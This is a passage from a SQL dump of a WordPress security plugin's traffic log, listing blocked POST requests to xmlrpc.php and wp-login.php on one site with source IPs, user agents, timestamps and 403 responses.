Safari\\/537.36\"}','BE9QWjgmwP6iMGLNVd8vpUtk',0,1664902478.4466,1816,'','POST',403,0,515,0,1,'',0),('185.2.4.84',3103917140,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','wWbxrV5IHvo7XzpREiFBgMuQ',0,1664907314.9912,3170,'','POST',403,0,515,0,1,'',0),('84.54.23.178',1412831154,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','tnNDyRe5d1VFcoBxulOk4ATL',0,1664907299.8812,18280,'','POST',403,0,515,0,1,'',0),('128.199.152.152',2160564376,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.141 Safari\\/537.36\"}','COnGiAe5BYujt9s6qo3ayVKp',0,1664907326.7311,572,'','POST',403,0,515,0,1,'',0),('43.129.81.132',729895300,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','rnlZiyRCTbMYv50BdXctf3u4',0,1664907328.7669,551,'','POST',403,0,515,0,1,'',0),('138.201.61.46',2328444206,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','VXM7bRoT0OGKwaPJqHxFg4Wc',0,1664907334.5898,475,'','POST',403,0,515,0,1,'',0),('51.38.132.211',858162387,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','76v0zJf3Dr58kxNyCAStsKYh',0,1664907335.6976,517,'','POST',403,0,515,0,1,'',0),('5.161.119.55',94467895,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','6tMehnbYfz0sQIEW4HVoTg1L',0,1664907341.1160,589,'','POST',403,0,515,0,1,'',0),('107.189.3.40',1807549224,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','zPagZ6kS4pL9nx3ONAt1HQeG',0,1664908163.2855,1216,'','POST',403,0,600,0,1,'',0),('205.185.116.156',3451483292,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','TdHv0xNEgMPDOc6lnht8YV1s',0,1664909094.5354,1384,'','POST',403,0,600,0,1,'',0),('209.141.37.194',3515688386,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','tq60VYZFz4B5v8AxGJieKRPC',0,1664909402.3569,2069,'','POST',403,0,600,0,1,'',0),('209.141.48.210',3515691218,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit\\/537.77.4 (KHTML, like Gecko) Version\\/6.1.5 Safari\\/537.77.4\"}','pDiUu0RXJr4nc12f3oBQeTa5',0,1664909497.2106,1292,'','POST',403,0,600,0,1,'',0),('185.2.6.13',3103917581,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko\\/20100101 Firefox\\/42.0\"}','K3x6WrylMbOohA5dsV8vznaS',0,1664909836.3193,3368,'','POST',403,0,515,0,1,'',0),('185.141.171.155',3113069467,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','5mGOlxXtuEKUJq6aFyieZ8Rp',0,1664909837.7020,2192,'','POST',403,0,515,0,1,'',0),('69.49.246.91',1160902235,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','4mucjJ8DPAypMde0TKs2txIB',0,1664909840.0434,671,'','POST',403,0,515,0,1,'',0),('104.251.216.88',1761335384,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-N960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','WoGmwgBIPvHeftXNanVFqxb0',0,1664909842.6459,503,'','POST',403,0,515,0,1,'',0),('162.241.126.46',2733735470,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','i61vxQhAtYzRXBDVnfcpd5jG',0,1664909847.0355,492,'','POST',403,0,515,0,1,'',0),('51.68.11.239',860097519,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','rSG8ZEtXu0VdOCk2PDhmTB4L',0,1664909848.9085,587,'','POST',403,0,515,0,1,'',0),('67.222.142.146',1138658962,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','XoGK3P0NtEOJF4AW7ynLv1xC',0,1664909852.3336,559,'','POST',403,0,515,0,1,'',0),('68.178.145.187',1152553403,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','ifocXpugxdQkKA6jPZeh8NH1',0,1664909855.0473,511,'','POST',403,0,515,0,1,'',0),('208.109.10.82',3496806994,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','f3rx9jc1ZgGe2Dyt5S0AN4Kp',0,1664909860.6932,533,'','POST',403,0,515,0,1,'',0),('65.52.67.200',1093944264,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','JYA4ywmSrQ1lo9VPMqkCxdBN',0,1664909862.0389,564,'','POST',403,0,515,0,1,'',0),('134.122.42.249',2256153337,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','jHMTEf1elJC6xXh2nIZP3wqd',0,1664909869.4180,2473,'','POST',403,0,515,0,1,'',0),('205.185.116.162',3451483298,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','UeIJpohsNRMBF3zTrGvOKmu5',0,1664910294.0531,1420,'','POST',403,0,600,0,1,'',0),('185.195.237.203',3116625355,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Q3iUBTa0PEMtmoGOWLc2pd6e',0,1664913350.1926,18755,'','POST',403,0,515,0,1,'',0),('104.251.216.88',1761335384,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-N960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','fFZz4VHwbBqcYXCIxpv9jP0K',0,1664913864.5494,15494,'','POST',403,0,515,0,1,'',0),('91.134.248.192',1535572160,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','465GFl9zAUKgSVCr7i1Z8MQo',0,1664913861.5717,18472,'','POST',403,0,515,0,1,'',0),('23.97.183.204',392280012,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','qA0RPWC9Mt6Ns8OjUy5QGu41',0,1664913863.3334,16760,'','POST',403,0,515,0,1,'',0),('185.2.4.84',3103917140,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','Zu4cXYBO9afsjELFbWhqPArd',0,1664913886.0468,1292,'','POST',403,0,515,0,1,'',0),('78.47.46.81',1311714897,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','FoTmtJnUgHC2c1kirxwdyqZL',0,1664913894.2888,570,'','POST',403,0,515,0,1,'',0),('134.122.42.249',2256153337,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','1nbRkMhPNA0j64x27wH5fpBc',0,1664913903.4041,1761,'','POST',403,0,515,0,1,'',0),('116.118.50.185',1953903289,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','CkudXEzDRqcKIxSs3VvYHfNG',0,1664913903.3092,1873,'','POST',403,0,515,0,1,'',0),('134.122.42.249',2256153337,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','hORJC56tZADWojidrpVal7MG',0,1664913910.9086,813,'','POST',403,0,515,0,1,'',0),('107.189.3.40',1807549224,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.6; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','sd1Fotn4EI5VQhxmcr0bfjiN',0,1664914652.9803,17095,'','POST',403,0,600,0,1,'',0),('185.156.175.35',3114053411,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','v8MbsP4HBuoWlTcENqwC0jQe',0,1664914895.0393,18867,'','POST',403,0,515,0,1,'',0),('45.162.228.171',765650091,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Lhkp9QP2MdeaxCEYcvorUWDG',0,1664915575.2755,19070,'','POST',403,0,515,0,1,'',0),('82.102.28.107',1382423659,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','rzI2EJpfMPwjGS1c7Ra8lV9N',0,1664916620.3413,13472,'','POST',403,0,515,0,1,'',0),('137.74.207.39',2303381287,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','9XeIk5glihnS2qHsaZETQcOF',0,1664919007.8052,4933,'','POST',403,0,515,0,1,'',0),('178.170.41.170',2997496234,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','jpns2GPocLNfXlOkq6zUFaC0',0,1664918998.4102,14329,'','POST',403,0,515,0,1,'',0),('185.2.6.13',3103917581,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','WI9wlegDvBEV13ycjtu26Z5G',0,1664918993.0365,19710,'','POST',403,0,515,0,1,'',0),('128.199.207.63',2160578367,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','0zyWPHOBCMDEVtpvfISluGk4',0,1664919017.4205,550,'','POST',403,0,515,0,1,'',0),('85.128.143.157',1434488733,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','RaMXUejfEqWAsPhQ2u9nS6NI',0,1664919022.2717,517,'','POST',403,0,515,0,1,'',0),('90.156.169.206',1520216526,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','maERCY6JkPsiHOLDMZ3duzvq',0,1664919025.2407,517,'','POST',403,0,515,0,1,'',0),('185.107.113.222',3110826462,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','qYbS0gVZ4Kyv2mzQXkinApaW',0,1664919026.0078,502,'','POST',403,0,515,0,1,'',0),('116.118.50.185',1953903289,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','cbQLjidUa92KVl1Yn5EF8gMr',0,1664919026.7282,542,'','POST',403,0,515,0,1,'',0),('185.2.6.13',3103917581,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','OHtlNJadMUpzn6X2x7uLhYc3',0,1664919028.8418,526,'','POST',403,0,515,0,1,'',0),('194.27.156.245',3256589557,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','TBnJAUXLjlyg13cNHrh5MvRs',0,1664919034.1927,556,'','POST',403,0,515,0,1,'',0),('146.56.186.107',2453191275,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','XpTuvAI3HKmWYO0cSRd8LiF5',0,1664919039.8005,683,'','POST',403,0,515,0,1,'',0),('141.98.101.133',2372035973,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','aI7td8wgDH6fiYAspn3GPTlr',0,1664919431.4130,2306,'','POST',403,0,515,0,1,'',0),('185.206.225.51',3117343027,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','7kRFPInQrMSyDo3utwvABqmi',0,1664920660.1513,19384,'','POST',403,0,515,0,1,'',0),('192.30.89.67',3223214403,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ELaKNuHoFO0GXvBA5n6bkswZ',0,1664920842.1900,2461,'','POST',403,0,515,0,1,'',0),('209.141.48.210',3515691218,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','F5pdmuaAlHGfEQ46SDTw8Ctz',0,1664921570.6390,1556,'','POST',403,0,600,0,1,'',0),('107.189.6.184',1807550136,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident\\/6.0)\"}','pKuPDmUFjxQstSv2rol9LNWf',0,1664922080.1437,1245,'','POST',403,0,600,0,1,'',0);
INSERT INTO `cerber_traffic` VALUES ('91.189.176.172',1539158188,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','0DgN7CnMsdxYtBr3Rqz1m6oE',0,1664922526.6982,2332,'','POST',403,0,515,0,1,'',0),('34.207.124.111',584023151,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','MjBedtmNOouacw0s142FASTk',0,1664922530.9945,1010,'','POST',403,0,515,0,1,'',0),('84.34.147.63',1411552063,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','JjnY9Sfu7hyvRGQCXD5pM4ow',0,1664922531.2900,906,'','POST',403,0,515,0,1,'',0),('185.210.145.8',3117584648,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','JnUfQuA4r6KLRiNzbaYt8eDh',0,1664922533.5239,477,'','POST',403,0,515,0,1,'',0),('52.136.249.235',881392107,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','RqAexDpKahYH4vQNOn70ZCWt',0,1664922542.3835,670,'','POST',403,0,515,0,1,'',0),('45.119.82.214',762794710,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','M70wmv1OBeQnYGkiJAsdl8Nq',0,1664922545.4022,512,'','POST',403,0,515,0,1,'',0),('47.242.115.115',804418419,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','WeMcQiFkO1TmahXKEf6H8sB5',0,1664922549.3840,538,'','POST',403,0,515,0,1,'',0),('68.235.52.36',1156264996,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','2CekrMtNWOVplFT1DKYZuQfL',0,1664922744.0227,2069,'','POST',403,0,515,0,1,'',0),('213.152.161.101',3583549797,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','d1wTyFpG9skELXCSmPjHVO7Z',0,1664922995.4235,11685,'','POST',403,0,515,0,1,'',0),('208.109.79.3',3496824579,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','HA2ESdgzZvWFrCi9NM8UnxRm',0,1664926162.1791,13184,'','POST',403,0,515,0,1,'',0),('185.220.174.115',3118247539,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','vwYTVyjSleN7KxCc1XMJ6QHI',0,1664926155.2655,20115,'','POST',403,0,515,0,1,'',0),('143.198.134.153',2412152473,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','Wrmydu5PLlxjzAbaCfnNTtIY',0,1664926158.6173,16763,'','POST',403,0,515,0,1,'',0),('47.242.115.115',804418419,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','L2WnoD0XrJzgd1e6pfKSRMTt',0,1664926179.6799,473,'','POST',403,0,515,0,1,'',0),('178.62.213.234',2990462442,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','BXlaUDbuGHIQxiSmhW7OR0yz',0,1664926180.3531,485,'','POST',403,0,515,0,1,'',0),('194.27.156.245',3256589557,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','cyqEWM5bzPForBpA4fZ6SsHK',0,1664926183.2081,512,'','POST',403,0,515,0,1,'',0),('67.222.142.146',1138658962,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','geZD5HkuhzY0TEdfiNmWopy8',0,1664926194.4602,1231,'','POST',403,0,515,0,1,'',0),('5.161.119.55',94467895,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','cQjDiSYA7Exm4vetRrUzynsL',0,1664926200.0862,1232,'','POST',403,0,515,0,1,'',0),('198.98.50.216',3328324312,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit\\/537.51.1 (KHTML, like Gecko) GSA\\/4.1.0.31802 Mobile\\/11D257 Safari\\/9537.53\"}','gHvcxCk7mqSPXnBpoWaN04ZO',0,1664929130.4036,471,'','POST',403,0,600,0,1,'',0),('184.75.221.171',3091979691,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','XetKWo5kAbi1Yr6DZL24mh83',0,1664929140.7067,1462,'','POST',403,0,515,0,1,'',0),('213.152.187.195',3583556547,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','FRWhos37GElOrJnUaYXfqMck',0,1664929176.6558,531,'','POST',403,0,515,0,1,'',0),('43.205.42.229',734866149,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','ftlMKhqrdYz78OSsBnuJcHiD',0,1664929818.2813,19436,'','POST',403,0,515,0,1,'',0),('3.141.216.42',59627562,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','4DaQNwL0Pl1Ezc8ubVpFnqTS',0,1664929826.5192,11262,'','POST',403,0,515,0,1,'',0),('8.210.93.170',148004266,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','j6ZTdB1erl3ckqWhJnLoVv0S',0,1664929836.4813,2670,'','POST',403,0,515,0,1,'',0),('108.170.27.202',1823087562,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','lfn6Lur04qZykcwTBJYdxtA8',0,1664929842.1013,579,'','POST',403,0,515,0,1,'',0),('185.210.145.8',3117584648,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','AROTk5We14lgoiXa0YSfjNHI',0,1664929843.6028,1121,'','POST',403,0,515,0,1,'',0),('13.64.60.246',222313718,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','SvhxQreNjuKJaRwV0t9E7yBd',0,1664929844.1927,1159,'','POST',403,0,515,0,1,'',0),('185.220.174.115',3118247539,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','HZVTMCzyvglXoi4dFNkqSUWt',0,1664929853.1646,1154,'','POST',403,0,515,0,1,'',0),('148.153.64.181',2493071541,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','8ICoyjVc3hKWErz72GdfeUMA',0,1664929857.5845,514,'','POST',403,0,515,0,1,'',0),('148.66.145.163',2487390627,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','lXsHbJkwp3mBnMue7LUAPxQa',0,1664929858.7627,502,'','POST',403,0,515,0,1,'',0),('134.19.179.195',2249438147,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','KJE8vb5RmkcY9or2jO37TGwI',0,1664932388.8890,19416,'','POST',403,0,515,0,1,'',0),('213.152.187.230',3583556582,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','lyIoBWDibKHVRuan7FN9OvhS',0,1664933079.8169,18133,'','POST',403,0,515,0,1,'',0),('209.141.49.253',3515691517,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','Uvp9L0k7tMQTPhH1zx8BRE3o',0,1664933196.8314,1181,'','POST',403,0,600,0,1,'',0),('148.66.145.163',2487390627,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 